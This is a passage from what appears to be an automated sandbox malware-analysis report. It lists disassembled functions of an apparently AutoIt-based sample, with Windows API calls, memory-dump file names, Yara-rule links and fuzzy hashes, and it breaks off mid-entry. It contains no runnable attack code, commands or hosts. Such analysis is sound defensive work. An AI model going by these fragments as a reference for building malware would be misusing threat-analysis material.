                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                                                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1454798553-0
                                                                                                                                                                                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                                                                                                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                • String ID: Q\E
                                                                                                                                                                                                                • API String ID: 909875538-2189900498
                                                                                                                                                                                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                                                                                                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                • API String ID: 2652923123-3941886329
                                                                                                                                                                                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                                                                                                Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove_strncmp
                                                                                                                                                                                                                • String ID: U$\
                                                                                                                                                                                                                • API String ID: 2666721431-100911408
                                                                                                                                                                                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                                                                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                                                                                                                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: LPT
                                                                                                                                                                                                                • API String ID: 3035604524-1350329615
                                                                                                                                                                                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                                                                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                                                                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                                                                                                Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \$h
                                                                                                                                                                                                                • API String ID: 4104443479-677774858
                                                                                                                                                                                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                                                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                                                                                                                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                • API String ID: 2931989736-1010288
                                                                                                                                                                                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                                                                                                Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                                                                                                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                                                                                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                                                                                                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                                                                                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                                                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$_sprintf_strlen
                                                                                                                                                                                                                • String ID: %02X
                                                                                                                                                                                                                • API String ID: 1921645428-436463671
                                                                                                                                                                                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                                                                                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                                                                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
